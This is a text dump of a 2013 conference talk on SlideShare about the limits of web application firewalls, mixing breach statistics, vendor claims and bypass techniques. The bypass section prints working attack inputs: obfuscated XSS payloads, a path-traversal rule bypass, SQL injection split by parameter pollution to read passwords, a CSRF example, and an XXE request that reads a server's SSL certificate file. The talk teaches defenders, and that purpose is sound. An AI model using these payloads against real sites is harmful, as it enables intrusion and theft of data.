SlideShare a Scribd company logo
1 of 62
Download to read offline
“We protect you applications”!
“No, you don’t”



Digicomp Hacking Day 2013
May 16th 2013
Sven Vetsch
§  Partner & CTO at Redguard AG
§  www.redguard.ch
§  Specialized in Application Security
§  (Web, Web-Services, Mobile, …)
§  Leader OWASP Switzerland
§  www.owasp.org / www.owasp.ch


 
sven.vetsch@redguard.ch


 
Twitter: @disenchant_ch / @redguard_ch
Sven Vetsch
§  Partner & CTO at Redguard AG
§  www.redguard.ch
§  Specialized in Application Security
§  (Web, Web-Services, Mobile, …)
§  Leader OWASP Switzerland
§  www.owasp.org / www.owasp.ch


 
sven.vetsch@redguard.ch


 
Twitter: @disenchant_ch / @redguard_ch
Disclaimer
This presentation is focused on classic WAF
functionality so we won’t get into Single-Sign-
On, Content Injection and so on.

All the views in this presentation are my own
and not necessarily those of Redguard AG.
Outline
WAF	
  in	
  
numbers	
  
What	
  do	
  
vendors	
  tell	
  
you	
  
Bypassing	
  
techniques	
  
Intro
I
>80%	
  of organizations were attacked
successfully at least once in 2011
Perceptions About Network Security - Ponemon Institute© Research Report, 2011
Companies hacked in 2012/2013
23%	
  
already experienced a data or
system breach as a result of an
application layer vulnerability
WhiteHat Security – Website Security Statistics Report May 2013
… only 29% in banking
55.6%	
  of all organizations use WAFs
WhiteHat Security – Website Security Statistics Report May 2013
WAF Deployment by Industry
WhiteHat Security – Website Security Statistics Report May 2013
29
30
17
30
32
30
50
20
12
10
10
8
43
30
17
30
36
29
17
10
12
Banking
Financial Services
Healthcare
Retail
Technology
Monitoring and actively blocking attacks
 Currently only monitoring traffic
Installing and/or configuration mode
 No WAF deployed
Don't know
WAF usage after a breach
38%
19%
6%
6%
31%
Monitoring and actively blocking attacks
Currently only monitoring traffic
Installing and/or configuration mode
Don't know
No WAF deployed
WhiteHat Security – Website Security Statistics Report May 2013
62%	
  of attacks can be blocked
by a WAF with default rule sets
NT OBJECTives - Analyzing the Effectiveness of Web Application Firewalls 2011
Organizations with a
Web Application Firewall
deployed had
11% more vulnerabilities,
resolved them 8% slower,
and had a
7% lower remediation rate.
WhiteHat Security – Website Security Statistics Report May 2013
A WAF makes me
less secure!?
§  Possible reasons:
§  Insufficient global security processes
§  Rules are not sufficient
§  Not enough resources to manage the WAF
§  WAFs are threated as if they could solve all
problem
§  WAFs are only in monitoring mode instead of
blocking anything
§  …
A WAF is a tool,
not a solution
Don’t worry, there are also good news
By summing all these percentages up
we could safely say that a WAF could
feasible help mitigate the risk of at
least
71%
of all custom web application
vulnerabilities
WhiteHat Security – Website Security Statistics Report May 2012
Vendor Claims
II
12 May 2013
 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch
 21
Vendor Supplied Certificate	

“[Product] guarantees security of web
applications.”
12 May 2013
 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch
 22
Vendor Supplied Certificate	

“The [Company] Web Application Firewall
quickly protects web servers from data
breaches and websites from defacement
without administrators waiting for clean code
or even knowing how an application works.”
12 May 2013
 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch
 23
Vendor Supplied Certificate	

“Fully addresses PCI 6.6”
15 May 2013
 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch
 24
Vendor Supplied Certificate	

“Fully addresses PCI 6.6”


 
 
Data Security Standard v2



6.6 For public-facing web applications, address new threats and
vulnerabilities on an ongoing basis and ensure these applications are
protected against known attacks by either of the following methods:

•  Reviewing public-facing web applications via manual or automated
application vulnerability security assessment tools or methods, at
least annually and after any changes

•  Installing a web-application firewall in front of public-facing web
applications
12 May 2013
 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch
 25
Vendor Supplied Certificate	

“Because of its unique blend of HTML and XML
security, the [Company] Web Application Firewall
provides a full compliance solution for the PCI
DSS sections 6.5 and 6.6, which mandate the
implementation of a Web application firewall by
June 30, 2008.”
15 May 2013
 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch
 26
Vendor Supplied Certificate	

“Because of its unique blend of HTML and XML
security, the [Company] Web Application Firewall
provides a full compliance solution for the PCI
DSS sections 6.5 and 6.6, which mandate the
implementation of a Web application firewall by
June 30, 2008.”


 
 
Data Security Standard v2



6.5 Develop applications based on secure coding guidelines. Prevent
common coding vulnerabilities in software development processes, to
include the following: [OWASP Top 10]
15 May 2013
 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch
 27
Vendor Supplied Certificate	

The [Product] offers you the following
technical features:
•  ...
•  Session fixation
•  …
12 May 2013
 Redguard AG | Sven Vetsch | sven.vetsch@redguard.ch
 28
Vendor Supplied Certificate	

The [Product] offers you the following
technical features:
•  ...
•  Session fixation
•  …
Bypassing WAFs
III
Insecure Rules
§  Let’s take the following pseudo rule:
if ($path == "/admin") {
if ($ipaddr == $internal_ipaddr)
[block request]
else
[allow request]
}
Insecure Rules
WAF
/admin
192.168.1.42	
  
203.0.113.23	
  
Insecure Rules
WAF
/../admin
192.168.1.42	
  
203.0.113.23	
  
Insecure Rules
"/admin" == "/admin"
-> true
"/../admin" == "/admin"
-> false
XSS – Obfuscation
§  When non-security people talk about XSS
<script>alert("XSS");</script>
XSS – Obfuscation
§  When security people talk about XSS
<script>alert(String.fromCharCode(88,
83,83));</script>
<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;
&#114;&#105;&#112;&#116;&#58;&#97;&#1
08;&#101;&#114;&#116;&#40;&#39;&#88;&
#83;&#83;&#39;&#41;>
XSS – Obfuscation
§  When appsec people talk about XSS
<script>
window[(+{}+[])[-~[]]+(![]+[])[-~-
~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])
[-~[]]+(!![]+[])[+[]]](("XSS"))
</script>
XSS – Obfuscation
§  When appsec people talk about XSS
<script>
[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]
+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+
[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+
[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+
[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]
+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([]
[[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+
[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]
((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])
[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+
([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!!
[]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+
[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])
[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+
{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])
[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+…
</script>
Try it yourself: http://patriciopalladino.com/files/hieroglyphy/
DOM-based XSS
<!DOCTYPE html>
<html>
<body>
Hello <span id="name"></span>
<script>
document.getElementById("name").innerHTML =
document.location.hash.slice(1);
</script>
</body>
</html>
DOM-based XSS
<!DOCTYPE html>
<html>
<body>
Hello <span id="name"></span>
<script>
document.getElementById("name").innerHTML =
document.location.hash.slice(1);
</script>
</body>
</html>
DOM-based XSS
http://www.example.com/#John
http://www.example.com/#<h1>John</h1>
DOM-based XSS
http://www.example.com/#<img src="x"
onerror="alert(1)"/>
A XSS attack like the one showed
neverhits the server
… so screw your WAF
Cross-Site Request Forgery (CSRF)
http://www.evil.com
 http://www.nice.com
1
 3
2
<img
src=“http://
www.nice.com
/buy?
article=123” />
Without understanding the
application or modifying the HTTP
response, a WAF
can’t protect
against CSRF
attacks.
… my experience would
be more around 50%
11.2%	
  of all application are vulnerable
to CSRF attacks
WhiteHat Security – Website Security Statistics Report May 2013
HTTP Parameter Pollution (HPP)
http://www.google.com/?
q=<script>&q=alert("XSS")&q=</script>
HTTP Parameter Pollution (HPP)
http://www.example.com/?id=1&id=2
Technology	
   Behavior	
   Result	
  
ASP	
  /	
  ASP.NET	
   ConcatenaJon	
   id=1,2	
  
PHP	
   Last	
  occurrence	
   id=2	
  
Java	
   First	
  occurrence	
   id=1	
  
HTTP Parameter Pollution (HPP)
§  Let’s have a look at the following simple
pseudo rule against SQL Injection attacks:
if $param_id.match(/.*select.*from.*/)
[block request]
HTTP Parameter Pollution (HPP)
http://www.example.com/page.aspx?id=123
http://www.example.com/page.aspx?
id=123;select%201,password%20from%20
users;%20--
http://www.example.com/page.aspx?
id=123;&id=select%201&id=password%20from
%20users;%20--
HTTP Parameter Pollution (HPP)
http://www.example.com/page.aspx?
id=123;&id=select%201&id=password%20from
%20users;%20--
§  id = 123;
§  id = select 1
§  id = password from users; --
-> 123; select 1,password from users; --
WAF rules are
not
platform independent
More things your WAF isn’t good at
§  Anti-Automation and process validation
§  Understanding application logic
§  Insufficient Authentication & Authorization
§  Brute Force Attacks
§  Session Fixation
§  Anomaly Detection
§  Improper Filesystem Permissions
§  Securing client side running code
§  …
Hacking a WAF (for fun and profit)
§  In the past, WAFs also suffered from
vulnerabilities like:
§  Filter Bypasses (a lot of them!!!)
§  XSS in their web admin interface
§  CSRF in their web admin interface
§  Default SSH root passwords
§  Information Disclosure about the LAN/DMZ
§  Arbitrary remote command execution
§  XML External Entity (XXE) Attacks
Hacking a WAF (for fun and profit)

Example scenario based on ModSecurity
XML External Entity (XXE) vulnerability
CVE-2013-1915
Hacking a WAF (for fun and profit)
WAF
Hacking a WAF (for fun and profit)
/etc/apache2/ssl/cert.pem
WAF
Hacking a WAF (for fun and profit)
Request:



Response:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/apache2/ssl/cert.pem"
>]><foo>&xxe;</foo>
Hacking a WAF (for fun and profit)
WAF
Wrap Up
IV
Conclusion
WAFs …
§  are good – at least they can help you
§  must be tuned by a trained professional
§  can’t compensate insecure code
§  aren’t an alternative to patching vulnerabilities
§  can generate a lot of profit for vendors so be
careful about what features you really need
and how well they perform
§  don’t solve all your appsec problems
We should accept WAFs for what
they really are: a method of
increasing the cost of attacks, but
not necessarily one that might
repel every attacker.
Ivan Ristic
Q & A
sven.vetsch@redguard.ch

@disenchant_ch / @redguard_ch

More Related Content

What's hot

Reading the Security Tea Leaves
Reading the Security Tea LeavesReading the Security Tea Leaves
Reading the Security Tea LeavesEd Bellis
 
Shift Left Security
Shift Left SecurityShift Left Security
Shift Left Securitygjdevos
 
Selling Infosec to the CSuite
Selling Infosec to the CSuiteSelling Infosec to the CSuite
Selling Infosec to the CSuiteDave R. Taylor
 
Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...POSSCON
 
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...CloudIDSummit
 
Qualys Corporate Brochure
Qualys Corporate BrochureQualys Corporate Brochure
Qualys Corporate BrochureQualys
 
What Professional Security Companies Must Use for Liability Defense
What Professional Security Companies Must Use for Liability DefenseWhat Professional Security Companies Must Use for Liability Defense
What Professional Security Companies Must Use for Liability Defense24/7 Software
 

What's hot (7)

Reading the Security Tea Leaves
Reading the Security Tea LeavesReading the Security Tea Leaves
Reading the Security Tea Leaves
 
Shift Left Security
Shift Left SecurityShift Left Security
Shift Left Security
 
Selling Infosec to the CSuite
Selling Infosec to the CSuiteSelling Infosec to the CSuite
Selling Infosec to the CSuite
 
Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...
 
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
CIS 2015 Identity and Data Security : Breaking the Boundaries - Nathanael Cof...
 
Qualys Corporate Brochure
Qualys Corporate BrochureQualys Corporate Brochure
Qualys Corporate Brochure
 
What Professional Security Companies Must Use for Liability Defense
What Professional Security Companies Must Use for Liability DefenseWhat Professional Security Companies Must Use for Liability Defense
What Professional Security Companies Must Use for Liability Defense
 

Viewers also liked

Keine Falten und ohne Pickel - Beauty-Retusche mit Photoshop
Keine Falten und ohne Pickel - Beauty-Retusche mit PhotoshopKeine Falten und ohne Pickel - Beauty-Retusche mit Photoshop
Keine Falten und ohne Pickel - Beauty-Retusche mit PhotoshopDigicomp Academy AG
 
Entscheidend für unseren Erfolg sind unser Einsatz, unsere Begeisterung und u...
Entscheidend für unseren Erfolg sind unser Einsatz, unsere Begeisterung und u...Entscheidend für unseren Erfolg sind unser Einsatz, unsere Begeisterung und u...
Entscheidend für unseren Erfolg sind unser Einsatz, unsere Begeisterung und u...Digicomp Academy AG
 
Wir brauchen eine App: Fallstricke und die Frage, was Nutzer eigentlich wollen
Wir brauchen eine App: Fallstricke und die Frage, was Nutzer eigentlich wollenWir brauchen eine App: Fallstricke und die Frage, was Nutzer eigentlich wollen
Wir brauchen eine App: Fallstricke und die Frage, was Nutzer eigentlich wollenDigicomp Academy AG
 
#onedigicomp: Neue Kunden dank sobu und Social Media
#onedigicomp: Neue Kunden dank sobu und Social Media#onedigicomp: Neue Kunden dank sobu und Social Media
#onedigicomp: Neue Kunden dank sobu und Social MediaDigicomp Academy AG
 
Umfangreiche Dokumente effizient formatieren
Umfangreiche Dokumente effizient formatierenUmfangreiche Dokumente effizient formatieren
Umfangreiche Dokumente effizient formatierenDigicomp Academy AG
 
Wie berühre ich das Herz der Online-Menschen
Wie berühre ich das Herz der Online-MenschenWie berühre ich das Herz der Online-Menschen
Wie berühre ich das Herz der Online-MenschenDigicomp Academy AG
 
Content, Copyright und Social Media
Content, Copyright und Social MediaContent, Copyright und Social Media
Content, Copyright und Social MediaDigicomp Academy AG
 

Viewers also liked (8)

Keine Falten und ohne Pickel - Beauty-Retusche mit Photoshop
Keine Falten und ohne Pickel - Beauty-Retusche mit PhotoshopKeine Falten und ohne Pickel - Beauty-Retusche mit Photoshop
Keine Falten und ohne Pickel - Beauty-Retusche mit Photoshop
 
Entscheidend für unseren Erfolg sind unser Einsatz, unsere Begeisterung und u...
Entscheidend für unseren Erfolg sind unser Einsatz, unsere Begeisterung und u...Entscheidend für unseren Erfolg sind unser Einsatz, unsere Begeisterung und u...
Entscheidend für unseren Erfolg sind unser Einsatz, unsere Begeisterung und u...
 
Wir brauchen eine App: Fallstricke und die Frage, was Nutzer eigentlich wollen
Wir brauchen eine App: Fallstricke und die Frage, was Nutzer eigentlich wollenWir brauchen eine App: Fallstricke und die Frage, was Nutzer eigentlich wollen
Wir brauchen eine App: Fallstricke und die Frage, was Nutzer eigentlich wollen
 
#onedigicomp: Neue Kunden dank sobu und Social Media
#onedigicomp: Neue Kunden dank sobu und Social Media#onedigicomp: Neue Kunden dank sobu und Social Media
#onedigicomp: Neue Kunden dank sobu und Social Media
 
Umfangreiche Dokumente effizient formatieren
Umfangreiche Dokumente effizient formatierenUmfangreiche Dokumente effizient formatieren
Umfangreiche Dokumente effizient formatieren
 
Wie berühre ich das Herz der Online-Menschen
Wie berühre ich das Herz der Online-MenschenWie berühre ich das Herz der Online-Menschen
Wie berühre ich das Herz der Online-Menschen
 
Alles oder nichts?
Alles oder nichts?Alles oder nichts?
Alles oder nichts?
 
Content, Copyright und Social Media
Content, Copyright und Social MediaContent, Copyright und Social Media
Content, Copyright und Social Media
 

Similar to «We protect your website» – No you don`t

Convince your board - cyber attack prevention is better than cure
Convince your board - cyber attack prevention is better than cureConvince your board - cyber attack prevention is better than cure
Convince your board - cyber attack prevention is better than cureDave James
 
How PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applicationsHow PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applicationsBen Rothke
 
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...Amazon Web Services
 
Presentation Flow Part A – The Challenge
Presentation Flow Part A – The ChallengePresentation Flow Part A – The Challenge
Presentation Flow Part A – The Challengewebhostingguy
 
Presentation Flow Part A – The Challenge
Presentation Flow Part A – The ChallengePresentation Flow Part A – The Challenge
Presentation Flow Part A – The Challengewebhostingguy
 
AV-Comparatives’ 2017 business software review
AV-Comparatives’ 2017 business software reviewAV-Comparatives’ 2017 business software review
AV-Comparatives’ 2017 business software reviewJermund Ottermo
 
Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Cenzic
 
1.3. (In)security Software
1.3. (In)security Software1.3. (In)security Software
1.3. (In)security Softwaredefconmoscow
 
Cw13 securing your journey to the cloud by rami naccache-trend micro
Cw13 securing your journey to the cloud by rami naccache-trend microCw13 securing your journey to the cloud by rami naccache-trend micro
Cw13 securing your journey to the cloud by rami naccache-trend microTheInevitableCloud
 
A Novel View of Applying FMECA to Software Engineering
A Novel View of Applying FMECA to Software EngineeringA Novel View of Applying FMECA to Software Engineering
A Novel View of Applying FMECA to Software EngineeringASQ Reliability Division
 
Introduction Sebyde BV | Security Testing | Security Awareness | Secure Devel...
Introduction Sebyde BV | Security Testing | Security Awareness | Secure Devel...Introduction Sebyde BV | Security Testing | Security Awareness | Secure Devel...
Introduction Sebyde BV | Security Testing | Security Awareness | Secure Devel...Derk Yntema
 
Vmug birmingham mar2013 trendmicro
Vmug birmingham mar2013 trendmicroVmug birmingham mar2013 trendmicro
Vmug birmingham mar2013 trendmicrodvmug1
 
Alexander Antukh. (In)security of Appliances
Alexander Antukh. (In)security of AppliancesAlexander Antukh. (In)security of Appliances
Alexander Antukh. (In)security of AppliancesPositive Hack Days
 
HMI/SCADA 리스크 감소
HMI/SCADA 리스크 감소HMI/SCADA 리스크 감소
HMI/SCADA 리스크 감소GE코리아
 
NEWSentinel_services15
NEWSentinel_services15NEWSentinel_services15
NEWSentinel_services15Bilha Diaz
 
第7回VEC制御システムサイバーセキュリティカンファレンス
第7回VEC制御システムサイバーセキュリティカンファレンス第7回VEC制御システムサイバーセキュリティカンファレンス
第7回VEC制御システムサイバーセキュリティカンファレンスchomchana trevai
 
August 2007 Presentation Flow Part A – The Challenge
August 2007 Presentation Flow Part A – The ChallengeAugust 2007 Presentation Flow Part A – The Challenge
August 2007 Presentation Flow Part A – The Challengewebhostingguy
 
August 2007 Presentation Flow Part A – The Challenge
August 2007 Presentation Flow Part A – The ChallengeAugust 2007 Presentation Flow Part A – The Challenge
August 2007 Presentation Flow Part A – The Challengewebhostingguy
 

Similar to «We protect your website» – No you don`t (20)

Convince your board - cyber attack prevention is better than cure
Convince your board - cyber attack prevention is better than cureConvince your board - cyber attack prevention is better than cure
Convince your board - cyber attack prevention is better than cure
 
How PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applicationsHow PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applications
 
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
AWS Partner Webcast - Web App Security on AWS: How to Make Shared Security Wo...
 
Presentation Flow Part A – The Challenge
Presentation Flow Part A – The ChallengePresentation Flow Part A – The Challenge
Presentation Flow Part A – The Challenge
 
Presentation Flow Part A – The Challenge
Presentation Flow Part A – The ChallengePresentation Flow Part A – The Challenge
Presentation Flow Part A – The Challenge
 
AV-Comparatives’ 2017 business software review
AV-Comparatives’ 2017 business software reviewAV-Comparatives’ 2017 business software review
AV-Comparatives’ 2017 business software review
 
Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...
 
1.3. (In)security Software
1.3. (In)security Software1.3. (In)security Software
1.3. (In)security Software
 
Cw13 securing your journey to the cloud by rami naccache-trend micro
Cw13 securing your journey to the cloud by rami naccache-trend microCw13 securing your journey to the cloud by rami naccache-trend micro
Cw13 securing your journey to the cloud by rami naccache-trend micro
 
A Novel View of Applying FMECA to Software Engineering
A Novel View of Applying FMECA to Software EngineeringA Novel View of Applying FMECA to Software Engineering
A Novel View of Applying FMECA to Software Engineering
 
Introduction Sebyde BV | Security Testing | Security Awareness | Secure Devel...
Introduction Sebyde BV | Security Testing | Security Awareness | Secure Devel...Introduction Sebyde BV | Security Testing | Security Awareness | Secure Devel...
Introduction Sebyde BV | Security Testing | Security Awareness | Secure Devel...
 
Vmug birmingham mar2013 trendmicro
Vmug birmingham mar2013 trendmicroVmug birmingham mar2013 trendmicro
Vmug birmingham mar2013 trendmicro
 
Alexander Antukh. (In)security of Appliances
Alexander Antukh. (In)security of AppliancesAlexander Antukh. (In)security of Appliances
Alexander Antukh. (In)security of Appliances
 
Alexander Antukh
Alexander AntukhAlexander Antukh
Alexander Antukh
 
HMI/SCADA 리스크 감소
HMI/SCADA 리스크 감소HMI/SCADA 리스크 감소
HMI/SCADA 리스크 감소
 
NEWSentinel_services15
NEWSentinel_services15NEWSentinel_services15
NEWSentinel_services15
 
Rik Ferguson
Rik FergusonRik Ferguson
Rik Ferguson
 
第7回VEC制御システムサイバーセキュリティカンファレンス
第7回VEC制御システムサイバーセキュリティカンファレンス第7回VEC制御システムサイバーセキュリティカンファレンス
第7回VEC制御システムサイバーセキュリティカンファレンス
 
August 2007 Presentation Flow Part A – The Challenge
August 2007 Presentation Flow Part A – The ChallengeAugust 2007 Presentation Flow Part A – The Challenge
August 2007 Presentation Flow Part A – The Challenge
 
August 2007 Presentation Flow Part A – The Challenge
August 2007 Presentation Flow Part A – The ChallengeAugust 2007 Presentation Flow Part A – The Challenge
August 2007 Presentation Flow Part A – The Challenge
 

More from Digicomp Academy AG

Becoming Agile von Christian Botta – Personal Swiss Vortrag 2019
Becoming Agile von Christian Botta – Personal Swiss Vortrag 2019Becoming Agile von Christian Botta – Personal Swiss Vortrag 2019
Becoming Agile von Christian Botta – Personal Swiss Vortrag 2019Digicomp Academy AG
 
Swiss IPv6 Council – Case Study - Deployment von IPv6 in einer Container Plat...
Swiss IPv6 Council – Case Study - Deployment von IPv6 in einer Container Plat...Swiss IPv6 Council – Case Study - Deployment von IPv6 in einer Container Plat...
Swiss IPv6 Council – Case Study - Deployment von IPv6 in einer Container Plat...Digicomp Academy AG
 
Innovation durch kollaboration gennex 2018
Innovation durch kollaboration gennex 2018Innovation durch kollaboration gennex 2018
Innovation durch kollaboration gennex 2018Digicomp Academy AG
 
Roger basler meetup_digitale-geschaeftsmodelle-entwickeln_handout
Roger basler meetup_digitale-geschaeftsmodelle-entwickeln_handoutRoger basler meetup_digitale-geschaeftsmodelle-entwickeln_handout
Roger basler meetup_digitale-geschaeftsmodelle-entwickeln_handoutDigicomp Academy AG
 
Roger basler meetup_21082018_work-smarter-not-harder_handout
Roger basler meetup_21082018_work-smarter-not-harder_handoutRoger basler meetup_21082018_work-smarter-not-harder_handout
Roger basler meetup_21082018_work-smarter-not-harder_handoutDigicomp Academy AG
 
Xing expertendialog zu nudge unit x
Xing expertendialog zu nudge unit xXing expertendialog zu nudge unit x
Xing expertendialog zu nudge unit xDigicomp Academy AG
 
Responsive Organisation auf Basis der Holacracy – nur ein Hype oder die Zukunft?
Responsive Organisation auf Basis der Holacracy – nur ein Hype oder die Zukunft?Responsive Organisation auf Basis der Holacracy – nur ein Hype oder die Zukunft?
Responsive Organisation auf Basis der Holacracy – nur ein Hype oder die Zukunft?Digicomp Academy AG
 
IPv6 Security Talk mit Joe Klein
IPv6 Security Talk mit Joe KleinIPv6 Security Talk mit Joe Klein
IPv6 Security Talk mit Joe KleinDigicomp Academy AG
 
Agiles Management - Wie geht das?
Agiles Management - Wie geht das?Agiles Management - Wie geht das?
Agiles Management - Wie geht das?Digicomp Academy AG
 
Gewinnen Sie Menschen und Ziele - Referat von Andi Odermatt
Gewinnen Sie Menschen und Ziele - Referat von Andi OdermattGewinnen Sie Menschen und Ziele - Referat von Andi Odermatt
Gewinnen Sie Menschen und Ziele - Referat von Andi OdermattDigicomp Academy AG
 
Querdenken mit Kreativitätsmethoden – XING Expertendialog
Querdenken mit Kreativitätsmethoden – XING ExpertendialogQuerdenken mit Kreativitätsmethoden – XING Expertendialog
Querdenken mit Kreativitätsmethoden – XING ExpertendialogDigicomp Academy AG
 
Xing LearningZ: Digitale Geschäftsmodelle entwickeln
Xing LearningZ: Digitale Geschäftsmodelle entwickelnXing LearningZ: Digitale Geschäftsmodelle entwickeln
Xing LearningZ: Digitale Geschäftsmodelle entwickelnDigicomp Academy AG
 
Swiss IPv6 Council: The Cisco-Journey to an IPv6-only Building
Swiss IPv6 Council: The Cisco-Journey to an IPv6-only BuildingSwiss IPv6 Council: The Cisco-Journey to an IPv6-only Building
Swiss IPv6 Council: The Cisco-Journey to an IPv6-only BuildingDigicomp Academy AG
 
UX – Schlüssel zum Erfolg im Digital Business
UX – Schlüssel zum Erfolg im Digital BusinessUX – Schlüssel zum Erfolg im Digital Business
UX – Schlüssel zum Erfolg im Digital BusinessDigicomp Academy AG
 
Die IPv6 Journey der ETH Zürich
Die IPv6 Journey der ETH Zürich Die IPv6 Journey der ETH Zürich
Die IPv6 Journey der ETH Zürich Digicomp Academy AG
 
Xing LearningZ: Die 10 + 1 Trends im (E-)Commerce
Xing LearningZ: Die 10 + 1 Trends im (E-)CommerceXing LearningZ: Die 10 + 1 Trends im (E-)Commerce
Xing LearningZ: Die 10 + 1 Trends im (E-)CommerceDigicomp Academy AG
 
Zahlen Battle: klassische werbung vs.online-werbung-somexcloud
Zahlen Battle: klassische werbung vs.online-werbung-somexcloudZahlen Battle: klassische werbung vs.online-werbung-somexcloud
Zahlen Battle: klassische werbung vs.online-werbung-somexcloudDigicomp Academy AG
 
General data protection regulation-slides
General data protection regulation-slidesGeneral data protection regulation-slides
General data protection regulation-slidesDigicomp Academy AG
 

More from Digicomp Academy AG (20)

Becoming Agile von Christian Botta – Personal Swiss Vortrag 2019
Becoming Agile von Christian Botta – Personal Swiss Vortrag 2019Becoming Agile von Christian Botta – Personal Swiss Vortrag 2019
Becoming Agile von Christian Botta – Personal Swiss Vortrag 2019
 
Swiss IPv6 Council – Case Study - Deployment von IPv6 in einer Container Plat...
Swiss IPv6 Council – Case Study - Deployment von IPv6 in einer Container Plat...Swiss IPv6 Council – Case Study - Deployment von IPv6 in einer Container Plat...
Swiss IPv6 Council – Case Study - Deployment von IPv6 in einer Container Plat...
 
Innovation durch kollaboration gennex 2018
Innovation durch kollaboration gennex 2018Innovation durch kollaboration gennex 2018
Innovation durch kollaboration gennex 2018
 
Roger basler meetup_digitale-geschaeftsmodelle-entwickeln_handout
Roger basler meetup_digitale-geschaeftsmodelle-entwickeln_handoutRoger basler meetup_digitale-geschaeftsmodelle-entwickeln_handout
Roger basler meetup_digitale-geschaeftsmodelle-entwickeln_handout
 
Roger basler meetup_21082018_work-smarter-not-harder_handout
Roger basler meetup_21082018_work-smarter-not-harder_handoutRoger basler meetup_21082018_work-smarter-not-harder_handout
Roger basler meetup_21082018_work-smarter-not-harder_handout
 
Xing expertendialog zu nudge unit x
Xing expertendialog zu nudge unit xXing expertendialog zu nudge unit x
Xing expertendialog zu nudge unit x
 
Responsive Organisation auf Basis der Holacracy – nur ein Hype oder die Zukunft?
Responsive Organisation auf Basis der Holacracy – nur ein Hype oder die Zukunft?Responsive Organisation auf Basis der Holacracy – nur ein Hype oder die Zukunft?
Responsive Organisation auf Basis der Holacracy – nur ein Hype oder die Zukunft?
 
IPv6 Security Talk mit Joe Klein
IPv6 Security Talk mit Joe KleinIPv6 Security Talk mit Joe Klein
IPv6 Security Talk mit Joe Klein
 
Agiles Management - Wie geht das?
Agiles Management - Wie geht das?Agiles Management - Wie geht das?
Agiles Management - Wie geht das?
 
